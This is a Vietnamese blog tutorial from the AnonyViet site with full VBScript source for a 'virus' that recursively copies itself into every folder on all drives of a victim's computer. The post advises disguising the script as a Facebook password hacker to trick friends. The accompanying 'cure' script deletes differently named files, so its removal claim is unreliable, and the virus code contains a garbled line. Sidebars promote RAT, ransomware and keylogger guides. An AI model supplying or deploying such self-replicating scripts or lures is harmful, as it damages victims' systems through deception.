• Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
AnonyViet
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
No Result
View All Result
AnonyViet
No Result
View All Result

Tạo Virus Copy Hàng Loạt Bằng Notepad

Minh Nhựt by Minh Nhựt
05/12/2016 - Updated on 16/12/2020
in Virus-Trojan-Rat
6

Hi chào các bạn ! hôm nay AnonyViet sẽ hướng dẫn các bạn tạo một con virus copy hàng loạt  để làm cho máy tính nạn nhân tràn ngập virus  :mrgreen:

Cách tạo Virus Copy Hàng Loạt

Bước 1: Các bạn mở notepad lên

Các bài viết liên quan

huong dan AsyncRAT Dos attack

Hướng dẫn sử dụng AsyncRAT – Điều khiển trái phép máy tính người khác

07/01/2021
dau hieu nhan biet windows bi virus

Các dấu hiệu máy tính bị nhiễm Virus và cách xử lý

28/12/2020
cai dat androrat vao dien thoai

AndroRAT: Remote và Hack dữ liệu điện thoại Android từ xa

22/12/2020 - Updated on 23/12/2020
foureys AV Evasion Tool.hog

FourEye – công cụ mã hóa Virus giúp không bị Antivirus phát hiện

20/12/2020

Bước 2: Sau đó bạn copy đoạn code này và paste vào notepad ! rồi lưu lại với tên gì cũng được như là : hack pass facebook chẳng hạn  😛

'Thuoc Doc !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus Boss !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus Boss !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub

Cách Giải Virus copy Hàng Loạt

Đương nhiên thuốc độc nào thì cũng có thuốc giải  🙂  Các bạn chỉ cần copy Đoạn Mã Dưới Đây Và Paste vào notepad lưu lại với tên Thuocgiai.vbs là xong  😎

'Thuoc Giai
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
'CAP.write VBCopy
'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub

Vậy là AnonyViet đã giúp bạn tạo 1 con virus troll bạn bè cực chất :v ! Bài viết lần sau ad sẽ tạo 1 em virus shutdown (tắt máy victim) dạng Hack Facebook  🙂  ! Khi Victim tưởng là hack thật và click Start Hack thì chương trình sẽ chạy giống như hack thật ! sao đó treo máy virus để victim không dừng được chương trình và sau đó là Tắt Máy  😀 ! Các bạn nhớ đón chờ nhé  😉

Xem thêm:  Share Virus Phá Hỏng Máy Tính Theo Phong Cách Ma quái

Chúc Các Bạn Thành Công !

Tags: Create Virustạo virus bằng notepadvirusVirus Coppyvirus troll bạn bè
Previous Post

TOP 9 Phần mềm diệt virus tốt nhất 2018

Next Post

Hướng dẫn xóa chữ “Shortcut” trên Desktop

Minh Nhựt

Minh Nhựt

Related Posts

setup Absorber keylogger
Virus-Trojan-Rat

Cách dùng Absorber Keylogger bí mật ghi lại thao tác bàn phím

15/01/2021 - Updated on 18/01/2021
huong dan AsyncRAT Dos attack
Virus-Trojan-Rat

Hướng dẫn sử dụng AsyncRAT – Điều khiển trái phép máy tính người khác

07/01/2021
cai dat androrat vao dien thoai
Virus-Trojan-Rat

AndroRAT: Remote và Hack dữ liệu điện thoại Android từ xa

22/12/2020 - Updated on 23/12/2020
foureys AV Evasion Tool.hog
Virus-Trojan-Rat

FourEye – công cụ mã hóa Virus giúp không bị Antivirus phát hiện

20/12/2020
Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 1
Virus-Trojan-Rat

Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet

19/12/2020
tim hieu rat la gi
Virus-Trojan-Rat

Tìm hiểu RAT – Remote Access Trojan – Phần mềm độc hại truy cập từ xa

04/10/2020 - Updated on 16/12/2020
Next Post
Hướng dẫn xóa chữ "Shortcut" trên Desktop 2

Hướng dẫn xóa chữ "Shortcut" trên Desktop

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

6 Comments
oldest
newest most voted
Inline Feedbacks
View all comments
Tuấn Anh | <span class="wpdiscuz-comment-count">96 comments</span>
Tuấn Anh | 96 comments
3 years ago

cái này thử trên máy lâu rồi ngồi xóa virus lòi c*t

0
Reply
khanh | <span class="wpdiscuz-comment-count">1 comments</span>
khanh | 1 comments
3 years ago

mở notepet ở đâu

0
Reply
shen | <span class="wpdiscuz-comment-count">3 comments</span>
shen | 3 comments
2 years ago
Reply to  khanh

=))) cậu thặc ngầu lòi

0
Reply
NguyenHaSon-2006 | <span class="wpdiscuz-comment-count">474 comments</span>
NguyenHaSon-2006 | 474 comments
3 years ago

omg, cái này đâu có giải đc đâu ad ? cái này chưa có thuốc giải mà

0
Reply
quang hung | <span class="wpdiscuz-comment-count">3 comments</span>
quang hung | 3 comments
3 years ago

ở bước 2 tạo filename bất kỳ với đuôi .vbs chứ

0
Reply
quang hung | <span class="wpdiscuz-comment-count">3 comments</span>
quang hung | 3 comments
3 years ago

sao cmt cua minh bi xoa vay mod

0
Reply

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác

Fshare

Các bài mới

cach hack dien thoai

12 Cách để Hacker có thể Hack điện thoại của bạn

25/01/2021
Ping of Death ddos

Ping of Death là gì? Thực hiện Ping of Death để DDOS như thế nào?

24/01/2021
Download Burp Suite 2020.12 Pro Full Key - Cách Active bản quyền 2

Download Burp Suite 2020.12 Pro Full Key – Cách Active bản quyền

24/01/2021
Cách chọn thức ăn theo Nhóm Máu để cường tăng sức khỏe

Cách chọn Thức Ăn theo Nhóm Máu để cường tăng sức khỏe

23/01/2021
Cách cài đặt Docker trên Ubuntu 20.04 LTS 3

Cách cài đặt Docker trên Ubuntu 20.04 LTS

23/01/2021

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên kết

Game B52 |  Tải game đổi thưởng online | Chơi game bài hot 2020 | Chơi game bài đổi thưởng online | Gam Víp | 88vin link

Liên hệ đặt Ads: [email protected]

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

Bài viết mới

  • 12 Cách để Hacker có thể Hack điện thoại của bạn
  • Ping of Death là gì? Thực hiện Ping of Death để DDOS như thế nào?
  • Download Burp Suite 2020.12 Pro Full Key – Cách Active bản quyền
  • Cách chọn Thức Ăn theo Nhóm Máu để cường tăng sức khỏe
  • Cách cài đặt Docker trên Ubuntu 20.04 LTS
  • Nhận bản quyền License 6 tháng VPN của Seed4Me
  • Giới thiệu về AnonyViet
  • Liên hệ Quảng cáo
  • Privacy & Policy
  • Contact

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

wpDiscuz